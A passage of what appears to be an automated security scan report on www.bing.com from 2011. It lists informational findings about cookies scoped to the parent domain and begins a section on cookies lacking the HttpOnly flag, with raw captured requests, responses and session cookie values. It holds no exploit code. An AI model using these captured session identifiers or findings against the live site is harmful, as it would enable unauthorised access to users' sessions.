Date: Fri, 11 Feb 2011 21:46:47 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:47 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460807; domain=.bing.com; path=/
Set-Cookie: _SS=SID=39C40F774DB04C78BCC469B988D1944B; domain=.bing.com; path=/
Content-Length: 0


2.19. http://www.bing.com/settings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /settings.aspx?pref_sbmt=1&ru=http%3A%2F%2Fwww.bing.com%3A80%2Flocal%2F&adlt_set=demote&geoname=Washington%2C+District+Of+Columbia&geonamedef=Washington%2C+District+Of+Columbia&setplang=NO_OP&rpp=10&enAS=1&langall=1&sl=37&GUID=DC63BAA44C3843F38378B4BB213E0A6F&uid=3874D123 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com:80/local/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 23:28:20 GMT
Connection: close
Set-Cookie: SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; expires=Sun, 10-Feb-2013 23:28:19 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297466900; domain=.bing.com; path=/


2.20. http://www.bing.com/shopping

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:46:34 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:35 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A2A898C7201E474486150618933AB2DB; domain=.bing.com; path=/
Content-Length: 90390

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.21. http://www.bing.com/shopping/binoculars/c/4378

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/binoculars/c/4378

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/binoculars/c/4378 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:33 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:34 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6FA303C0EC0A468CBC9A123EAF0F8F57; domain=.bing.com; path=/
Content-Length: 89844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.22. http://www.bing.com/shopping/classic-womens-fragrances/r/162

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/classic-womens-fragrances/r/162

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/classic-womens-fragrances/r/162 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:26 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C0C28A6164ED41C38DC21B95216F1854; domain=.bing.com; path=/
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.23. http://www.bing.com/shopping/pet-litter-supplies/c/6874

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/pet-litter-supplies/c/6874

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shopping/pet-litter-supplies/c/6874 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:58 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=55C1E3103C224B9EAF396B98665F1BA5; domain=.bing.com; path=/
Content-Length: 76539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...

2.24. http://www.bing.com/travel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.bing.com/travel/
Date: Fri, 11 Feb 2011 21:46:56 GMT
Connection: close
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:55 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460815; domain=.bing.com; path=/
Set-Cookie: _SS=SID=130927E42C87488A80B3458098DA4E9D; domain=.bing.com; path=/


2.25. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /travel/content/search HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:19 GMT
Content-Length: 22048
Connection: close
Set-Cookie: JSESSIONID=7EB8619940D62EA6532C729CCECB1A45; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:19 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3156FC6FA1B4456BB9BC9890E342EC52; domain=.bing.com; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
...[SNIP]...

2.26. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=614
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:54:08 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:53 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=6992B41421FD424494A2E9A2F1D31BD9; domain=.bing.com; path=/
Content-Length: 163651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.27. http://www.bing.com/videos/results.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/results.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos/results.aspx HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: private
Content-Length: 0
Location: http://www.bing.com/videos/browse
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Fri, 11 Feb 2011 21:43:52 GMT
Connection: close
Set-Cookie: VIDSCHUSR=CLICKMODE=0&VMUTE=0&PARTNER=0; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/videos
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:52 GMT; domain=.bing.com; path=/
Set-Cookie: _HOP=I=1&TS=1297460632; domain=.bing.com; path=/
Set-Cookie: _SS=SID=D9A439CD6DD34C458F5BDF24BB030719; domain=.bing.com; path=/


2.28. http://www.bing.com/videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/10-valentines-presents-you-should-probably-avoid/ufu8tt1z HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:00 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:00 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=2E275C0252494A33BD7C7B00733A78E2; domain=.bing.com; path=/
Content-Length: 73214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.29. http://www.bing.com/videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/brad-pitt-picks-angelinas-outfits/17wgub818 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:58:54 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:54 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3E58DCD97AD8436DB0D6F76EA649A7C4; domain=.bing.com; path=/
Content-Length: 68575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.30. http://www.bing.com/videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/fully-fit-the-office-workout/1l0jbr4q7 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:15 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.125 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:15 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=A410FF9BF98B4F51BF7EF5A84D10EA58; domain=.bing.com; path=/
Content-Length: 73861

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.31. http://www.bing.com/videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/how-to-cover-up-a-tattoo/1iow3yvpv HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:48:52 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:43:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:43:59 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=438B0C95E5964EF9BFC5329EA9644004; domain=.bing.com; path=/
Content-Length: 74286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.32. http://www.bing.com/videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/idol-auditions-break-up-couple/17wypfnoa HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:12 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.078 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=296FB50835524F1CAC808C6CC833F2EF; domain=.bing.com; path=/
Content-Length: 68455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

2.33. http://www.bing.com/videos/watch/video/tip-stress-and-love/1revqyosz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/tip-stress-and-love/1revqyosz

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videos/watch/video/tip-stress-and-love/1revqyosz HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=900
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:59:23 GMT
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.047 secs
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:44:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:44:23 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=5F471059863C43D5904D61DB170BF835; domain=.bing.com; path=/
Content-Length: 72713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...

3. Cookie without HttpOnly flag set
There are 39 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie header.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.bing.com/travel/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
